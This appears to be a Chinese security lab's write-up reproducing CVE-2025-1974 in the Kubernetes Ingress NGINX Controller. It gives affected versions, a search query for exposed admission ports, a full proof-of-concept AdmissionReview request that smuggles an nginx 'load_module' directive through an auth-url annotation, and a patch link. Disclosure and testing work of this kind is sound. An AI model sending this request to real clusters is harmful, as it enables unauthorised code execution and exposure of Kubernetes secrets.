【成功复现】Ingress NGINX Controller远程代码执行漏洞(CVE-2025-1974)

【成功复现】Ingress NGINX Controller远程代码执行漏洞(CVE-2025-1974)

原创 弥天安全实验室 弥天安全实验室 2025-04-16 14:04

网安引领时代,弥天点亮未来  

Image

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍Kubernetes ingress-nginx是云原生计算基金会(Cloud Native Computing Foundation)开源的Kubernetes 的入口控制器,使用NGINX作为反向代理和负载均衡器。Kubernetes ingress-nginx存在安全漏洞,该漏洞源于在某些条件下,未认证的攻击者可通过访问pod网络在ingress-nginx控制器环境中执行任意代码,可能导致Secrets泄露。0x02影响版本

1、 ingress-nginx <= 1.12.0

2、 ingress-nginx <= 1.11.4


0x03漏洞复现

1.访问漏洞环境(
ssl:”ingress-nginx” port:8443)


2.对漏洞进行复现 POC 漏洞复现POST / HTTP/1.1Host: 127.0.0.1:8443Content-Type: application/jsonContent-Length: 1599{  “kind”: “AdmissionReview”,  “apiVersion”: “admission.k8s.io/v1”,  “request”: {    “uid”: “d48aa397-c414-4fb2-a2b0-b28187daf8a6”,    “kind”: {      “group”: “networking.k8s.io”,      “version”: “v1”,      “kind”: “Ingress”    },    “resource”: {      “group”: “networking.k8s.io”,      “version”: “v1”,      “resource”: “ingresses”    },    “requestKind”: {      “group”: “networking.k8s.io”,      “version”: “v1”,      “kind”: “Ingress”    },    “requestResource”: {      “group”: “networking.k8s.io”,      “version”: “v1”,      “resource”: “ingresses”    },    “name”: “test-ee05c512-4ea7-418b-b4aa-9fc5a10874ee”,    “namespace”: “default”,    “operation”: “CREATE”,    “userInfo”: {    },    “object”: {      “kind”: “Ingress”,      “apiVersion”: “networking.k8s.io/v1”,      “metadata”: {        “name”: “test-ee05c512-4ea7-418b-b4aa-9fc5a10874ee”,        “namespace”: “default”,        “creationTimestamp”: null,        “annotations”: {“nginx.ingress.kubernetes.io/auth-url”: “http://example.com#;load_module test;\n”        }      },      “spec”: {        “ingressClassName”: “nginx”,        “rules”: [          {            “host”: “ee05c512-4ea7-418b-b4aa-9fc5a10874ee”,            “http”: {              “paths”: [              ]            }          }        ]      },      “status”: {        “loadBalancer”: {}      }    },    “oldObject”: null,    “dryRun”: true,    “options”: {      “kind”: “CreateOptions”,      “apiVersion”: “meta.k8s.io/v1”    }  }}证明漏洞存在3.Yakit插件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/kubernetes/ingress-nginx/releases/tag/controller-v1.12.1详细了解推荐阅读下文https://mp.weixin.qq.com/s/JjdtzRVin9zedz8bdHh9Rg弥天简介学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润!   弥  天安全实验室